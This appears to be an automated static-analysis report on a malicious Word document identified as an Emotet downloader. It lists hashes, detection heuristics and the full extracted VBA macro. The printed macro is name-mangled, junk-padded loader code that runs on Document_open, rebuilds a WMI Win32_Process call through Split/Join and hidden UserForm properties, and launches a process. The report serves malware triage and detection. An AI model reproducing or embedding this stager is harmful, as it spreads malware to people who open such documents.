Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 37211044dbd4ad8c…

MALICIOUS

Office (OLE)

200.3 KB Created: 2019-12-18 23:23:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: 4432eb39a5f9126437dfebf97d11d313 SHA-1: b8503bc283d476544903dacee687265b7edbcc54 SHA-256: 37211044dbd4ad8c0eaa62af17737b76099852c994767f3c37d9b95fb2166181
232 Risk Score

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-7465038-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7465038-1
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Yhtwsucjn = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Dpjonrndf.Zldjjoofvb + "rocess"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Uvhjjoimxb = VBA.CreateObject(JJKBSKJ + Yhtwsucjn)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10975 bytes
SHA-256: dcfcc895cb193cfa88679924d00ad9cc54b6c92b9502f6012e548a1e9c81c927
Detection
ClamAV: No threats found
Obfuscation or payload: likely
299 of 507 identifiers look randomly generated (e.g. 'Pcolfvvjhmwgn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Dpjonrndf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Zldjjoofvb, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Tlcjlvmylqwab = Vqnqreweyqoqq
Mytpaewpzi = 205
Xdfgjvzbaee = ("Doloribus ullam.")
Wgetwfvmadyh = (883)
Dim Vyanhknza As Boolean
Dim Furjjiupvd As Integer
Dim Wcdkewagyxoe As Boolean
Dim Qwtgxfmjrkedq As Integer
Dim Spdxgekez As Boolean
Dim Alligmhk As Double
Dim Vpgrfnltgbfec As String
Kgvvfstxu = (719)
Dim Xjerwgeh As String
Xgbqzkti = ("Vel.")
Jeavglolfbsl = (211)
Dim Pcpofyauk As Boolean
Aueghaowjqt = Lkrsbuiluv
Vedyuotthfqke = Dobpwtgc
Htqybfzck = "Amet impedit qui."
Lyobzoafthoet = 203
   Zwifyhcpkoqtp = Oqtsfqheexxuh
Ynkrujyxcg = 889
Catvtcklvqzs = ("Voluptate autem maiores ut.")
Sdiamvhypdjy = (207)
Dim Qtqlkvfdkbe As Integer
Dim Vqhnrhcrvpcuz As Boolean
Dim Kqmuouvc As Integer
Dim Holosgvuxlh As Integer
Dim Rqkyudorlib As Integer
Dim Okdczohzjtrc As Integer
Dim Hzbcwcbvde As Boolean
Ylwwgkvz = (662)
Dim Rultaphxtv As String
Gsjfeqstgyfy = ("Asperiores id dolorum natus libero veritatis molestiae amet quia.")
Dnnggdrvihqcc = (81)
Dim Gkbideemaff As Integer
Esomeeltknood = Cpcngfaoep
Zbmabwtrpse = Zuvwmtatujkdr
Edkwsnmsxmns = "Dolorem."
Ukldpglesswl = 893
   Axtdxgltbjssx = Uhmwxlmjcma
Fnvgtjcwsws = 751
Afqkcwnqxjk = ("Sed velit.")
Loorqxrvn = (622)
Dim Myoqtcltwjk As Boolean
Dim Skdbzhdkhoxn As String
Dim Fvjsmrcy As Double
Dim Wwvyqcvbh As Integer
Dim Gtqwfjdejqdma As Boolean
Dim Mrxpqufvecmft As String
Dim Wfmczbsvghyt As String
Tkutsqddsfe = (811)
Dim Lttekaquxaxgw As String
Rhsblelsslbop = ("Rufus")
Gyydgbncnte = (983)
Dim Jwnvwhmkndps As String
Atjlbbkt = Tnudeehhi
Vyfshgctvi = Anjehcvkq
Cinifivik = "Et culpa magni eveniet."
Eudtuuhzdzhg = 12
Saztbwjqonfxd
End Sub

Attribute VB_Name = "Ixcwvnknjlj"
Attribute VB_Base = "0{4685CC4F-4C40-4F5D-9BF7-3E6538FBFF93}{C390043E-8603-44C2-BDA1-89CBF6781149}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Zlljqntwt"
Function Xxerdjkenbiax()
   Muqreidgf = Atcqbmeuqlw
Cnnxtdolhhwp = 896
Enjjoucvvpbhp = ("Ipsam voluptatem voluptatem.")
Kvpevoqugnc = (369)
Dim Tlfbuoah As Boolean
Dim Ivshrxvl As Boolean
Dim Vwmhklinscv As Double
Dim Zckkamayidtg As String
Dim Hzwlcoig As Integer
Dim Xqjfmoegwateh As Double
Dim Ynrntsabjbnv As String
Xmsflmkdvluy = (460)
Dim Ijcsiqdaqt As Double
Xoaezsnmy = ("Repellendus natus doloremque.")
Zwbkurgt = (184)
Dim Ptzyvmapw As String
Ceowdqmbkblvi = Hgijkaibhvagd
Wbrbwrnorbu = Ddxquzfugn
Udgbdkivxekeh = "Maiores non."
Tsrhpiyxd = 11
Wzwklzqxdngf = Dpjonrndf.Zldjjoofvb
   Eieyxlosciis = Ztgpmoqryhjw
Vlflmjwqfpspt = 863
Xakibsourz = ("Cum dolorum voluptas mollitia modi molestiae.")
Mkxpbcqw = (238)
Dim Wgqwjorw As Double
Dim Zhagynhfgqnm As Integer
Dim Jfhzrndus As Integer
Dim Esejacvco As Boolean
Dim Krqnukpap As Boolean
Dim Kndgrejr As Boolean
Dim Fbtucwgnsko As Double
Vpjesses = (159)
Dim Birftlrswyre As Integer
Srnjmxyohjiqi = ("Aperiam similique et.")
Zawagrmlrmc = (75)
Dim Remrzmlafvfi As Double
Ahxdcqcxxve = Fgwwkvgwd
Rwppteqsjem = Jzkptgqmphfu
Umprxkglgbmds = "Totam sit autem iure."
Aatccnklqc = 582
Mhjeqmjxjfotc = Wzwklzqxdngf + Ixcwvnknjlj.Dxsgnookgu + Ixcwvnknjlj.Eyklotir + Ixcwvnknjlj.Awwmxmfxppq
   Ihrwtzmbskyw = Motwcnppvebo
Phpjgqpx = 447
Sfixwdmruxaih = ("Ab modi dignissimos.")
Tdtlnuepmllv = (151)
Dim Seoavdxfrss As Boolean
Dim Umzgzhrmmw As Boolean
Dim Dnpwmliwbbsmi As String
Dim Uolasvjkc As String
Dim Lnxdficar As Boolean
Dim Jfgkujstm As Boolean
Dim Dxybvteudnj As Integer
Uzywkjhu = (326)
Dim Ffuiaarjzfx As String
Fdnjwxmu = ("Repudiandae sit dicta nemo iusto libero.")
Gqvkvjdrtoksv = (231)
Dim Dtlejccjzt As Boolean
Alwcsfhnrfpvz = Ewpmhmxsdaq
Egvrcndgwlrno = Yepemnymjglk
Tccoljkjxtmt = "Audrey"
Lyztyduyk = 773
Iaouucamcqi = Mhjeqmjxjfotc + Ixcwvnknjlj.Knyhiywvd + Ixcwvnknjlj.Zqcilzsiatds.Factoid
   Cdxaznywkcss = Klnptcoytkks
Zwwzvwhnaman = 690
Jspifqopsnyc = ("Aut maxime omnis.")
Kmqhjexn = (409)
Dim Wiowlboghuoa As Integer
Dim Mofkdibt As String
Dim Dnwsdpxv As Double
Dim Lxbrdrysujojs As Integer
Dim Vzmkxsdpltyf As Integer
Dim Sxtpyqpm As Boolean
Dim Mkiyjotvh As Double
Qklndihqy = (244)
Dim Cpclvutxfi As Double
Ynjefwzdx = ("Leticia")
Bnhbvihwpaah = (272)
Dim Ytzbkrzednau As String
Uycoevby = Ypymwfygqjhc
Ngtwjuba = Bqylcxuzf
Utnixotd = "Tempore."
Rzabyceotqxl = 492
Xxerdjkenbiax = Kunnxvwc + Iaouucamcqi + Kunnxvwc
   Hzrmgqkfky = Dijqnwglfozf
Omtmbpbzmeaax = 705
Ekdthvzor = ("Magnam.")
Oqhtzlngbx = (317)
Dim Wkrevfqmzygad As Boolean
Dim Reoxctqbks As String
Dim Omrhgtmhj As Double
Dim Ejaflqjhpdzw As Double
Dim Aiegjglbab As String
Dim Qzgrpcbmk As String
Dim Oekbldbp As Boolean
Ugkibakfciz = (215)
Dim Zjayoxvq As Integer
Gpbyeayzmkt = ("Brent")
Wiobrgifcjbl = (422)
Dim Emruystdsz As Integer
Fdimujdpe = Vdjsidgz
Ptnupvdasp = Lbfwqorhbgomw
Zkzmaospkvs = "Numquam numquam."
Zolamvsinln = 365
End Function
Function Saztbwjqonfxd()
   Ajtnwknljrn = Fgeilnbjmqcgl
Kkmaxiarx = 869
Yjpcockiwq = ("Est repellat dolorem.")
Qdagnsrhk = (305)
Dim Bzenxnfpg As Boolean
Dim Ostjcawc As Boolean
Dim Cewxwbmygwzu As Integer
Dim Djomvrabaoo As Boolean
Dim Dqrkhumyuiq As Double
Dim Trzibunegs As String
Dim Hsradhiooi As Integer
Lrzsqiaymjx = (609)
Dim Smuujxxf As String
Cvxrbhmx = ("Frankie")
Kwkuvnyrmw = (996)
Dim Hyluotflkjkr As Double
Srzqammarvcaz = Fsebhnzfgtssz
Mswyugsw = Hhhprnujmf
Ppjtltxhu = "Voluptatem et voluptates."
Qjkdaasn = 231
hb32bmmejdn = "23nNNgi3_7&&jjNN#"
Yhtwsucjn = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Dpjonrndf.Zldjjoofvb + "rocess"
   Ebkdamwwelhgs = Ezzxsror
Rghhvqwy = 276
Bhiynyja = ("Facilis quo.")
Rrhwjjjzke = (16)
Dim Yaifppiuli As String
Dim Dxqakthnwzla As Double
Dim Xmhwnnlqii As Integer
Dim Jtrabjrot As Boolean
Dim Iprwdnzohger As Integer
Dim Oulhmoikdko As Boolean
Dim Xcilsmuyhwqic As Double
Iafbvnnofggw = (219)
Dim Mgihsbmzvlfcp As Integer
Uzjfpccemaikn = ("Hic provident.")
Lqkavpia = (415)
Dim Gjetwtygp As Integer
Xruvjcvhj = Wraproljmyyxi
Kqhkdyrwnyqem = Sbqinntgbj
Yjztlclrf = "Saepe ex."
Naeumqbkzxzfx = 677
Set Uvhjjoimxb = VBA.CreateObject(JJKBSKJ + Yhtwsucjn)
   Hocpwrvr = Tdexiiqshq
Dpclqfoug = 543
Dsfhhggf = ("Sed.")
Wkzlaxxznac = (535)
Dim Knmlbpdd As Boolean
Dim Daecaimakt As Double
Dim Edzqiqvtj As Boolean
Dim Svuvufqc As String
Dim Avlvvwqbzrhh As String
Dim Jmkhmhlafx As String
Dim Gnrvuqjqe As String
Unufrjgvlsl = (344)
Dim Ujqcfzqnj As Boolean
Ckewqxmebxq = ("Cupiditate.")
Ctrycbovbibl = (146)
Dim Kerblyech As Double
Enfgkkdoyz = Skizuabckq
Akwfvnzm = Ynjpryxwchy
Qdyjcfczowdfa = "Similique recusandae quia qui."
Tkzzwemuqfidf = 205
Qgurnyzimc = Yhtwsucjn + Ixcwvnknjlj.Prjvwtngmkbam.ControlTipText + Ixcwvnknjlj.Skwxrnwv.ControlTipText
   Paenutzhdj = Oamtadnqrfeku
Kyoptbvxcepm = 927
Txxghrls = ("Vero sunt doloribus perspiciatis omnis ex eius quo.")
Vtlrjwts = (885)
Dim Oiptlwtckolrx As Integer
Dim Hhengksqkuzqd As String
Dim Kxprolidv As Double
Dim Iiusdwxtcopfp As Integer
Dim Sezlgppedobgz As Double
Dim Djcibkvrqdskl As Double
Dim Radssdejeitd As Double
Cpxgdlgdh = (32)
Dim Wnihnedmiw As Integer
Huvyzxzh = ("Rerum et.")
Mnoueifoo = (17)
Dim Gvqwbqdprhi As String
Plhnhfhefr = Tsavguhimbye
Hwspxembesash = Lbeqbixduk
Tzomdkjx = "Eos quasi."
Qtvirohuon = 790
Jyiooqlvuhgf = Qgurnyzimc + Dpjonrndf.Zldjjoofvb
   Xyiudxnurdzqr = Noinoosqhrcv
Vszlxfef = 875
Ekorwdlnprhn = ("Arlene")
Blehbcbczrwkz = (501)
Dim Hqhaojezaueg As Boolean
Dim Wvilcjmaw As Integer
Dim Sckxvldgti As Boolean
Dim Msnxlenxwmvcv As Integer
Dim Xvggtdpvgtcei As Integer
Dim Vyvwvtom As Boolean
Dim Jgoggibhmfkmb As String
Wwhdiaewwqxgz = (738)
Dim Jjfkkwaoa As Integer
Xwvqiwoa = ("Soluta at.")
Hitwekspibbog = (287)
Dim Hrvywhgs As Integer
Hagibrzt = Bmogmizs
Iqapbetbcoapm = Kmhhkcvwszvdp
Iojhurzqgwy = "Pearl"
Ublavjbvrlz = 641
Set Saztbwjqonfxd = CreateObject(Jyiooqlvuhgf)
   Ausacwsyhc = Bxhfaficgyy
Kxygdoumixi = 105
Hzbryqzlotn = ("Nihil facilis enim saepe repudiandae quibusdam reprehenderit.")
Xzxebwpkrzu = (486)
Dim Nbcszybm As String
Dim Bpzheewdkk As Boolean
Dim Vpdvlodqagz As String
Dim Xivtouaz As Boolean
Dim Pcolfvvjhmwgn As Integer
Dim Mmigiuqef As Integer
Dim Akwpqretotxdy As String
Wrigrvgob = (385)
Dim Tibyxifiulnr As Boolean
Bualpjjld = ("Rerum praesentium totam et.")
Vzobuvuixywrp = (318)
Dim Ypasjambqag As Double
Yihedabjqh = Tjzgfckpaku
Oyjxyanshj = Rnpuehhacqq
Kxwnmnoxupcr = "Est dolorem commodi nulla quod."
Hmylzkpopuvv = 940
Saztbwjqonfxd.XSize = False
   Nxpqixfbmnkfg = Logjqlucpdse
Nmbwnsnj = 81
Jlfvwlne = ("At cum animi exercitationem sed odio eum.")
Huxicnsuznpt = (643)
Dim Zajisrfc As String
Dim Zefygepo As Double
Dim Tsotuazsj As String
Dim Qhfwvcflnqf As Double
Dim Ixhtovxauxgh As Double
Dim Osrmswqjxac As Double
Dim Kckpowuk As Double
Gdnemwkyojmr = (416)
Dim Dmzezagqetnyk As Boolean
Lrfrzlifrdnm = ("Et et molestiae maiores.")
Aptiombwqlv = (127)
Dim Ztrolcfdshz As Integer
Vghamnecde = Vvroauwnvjm
Bkwkihupdqu = Yignvoxyqgo
Ndfpluhlldir = "Aspernatur."
Zasewakvoginx = 299
Saztbwjqonfxd.YSize = False
   Scbnzkmwbg = Tvswwflntqnmt
Ohswunvjyhyf = 772
Xmjavjzbena = ("Aut eligendi assumenda explicabo.")
Rbopuapyo = (158)
Dim Mkxmtoxayz As Integer
Dim Dlxowmdf As String
Dim Gehjreexoid As Boolean
Dim Lmnhppaggvx As String
Dim Wltmldpw As Integer
Dim Ekxtvblmafym As Boolean
Dim Enqvjzikzn As String
Dcxzjqhtixsv = (99)
Dim Vixffkjkh As Boolean
Tnejuljldyi = ("Allison")
Vheizguu = (985)
Dim Eznthxjsu As Integer
Pcdkomjkbg = Wkyfakadsdjz
Rbntfoqnf = Yltlkpxr
Ijsihtvtmtd = "Amet autem iure."
Uhwhbycif = 270
Do While Uvhjjoimxb.Create(UJNDB & Xxerdjkenbiax, Kiluwjoybw, Saztbwjqonfxd, Tbthmthix)
Loop
   Rgibleorrsgx = Nvrouofrf
Kubhwvyc = 95
Wyddeesdkwd = ("Et.")
Artevinza = (432)
Dim Bjnjvxhvssrwn As Integer
Dim Knouhagoapc As Double
Dim Tcnvugbu As String
Dim Hnoilnjug As Integer
Dim Yalgwxuvm As Integer
Dim Gfbpevcgjvsf As String
Dim Tsvaruwwx As String
Coyjgzfo = (855)
Dim Jhvinszkj As Boolean
Ezcezuuzwjif = ("Voluptatem repellendus quos nulla.")
Gexcwnqs = (372)
Dim Lzrecwmnpg As Boolean
Vehfkprxbbi = Nchnrelzs
Cpwawupg = Jsvrdbacijrl
Tfzycmqckgc = "Delectus quos."
Raglbboejlwo = 400
End Function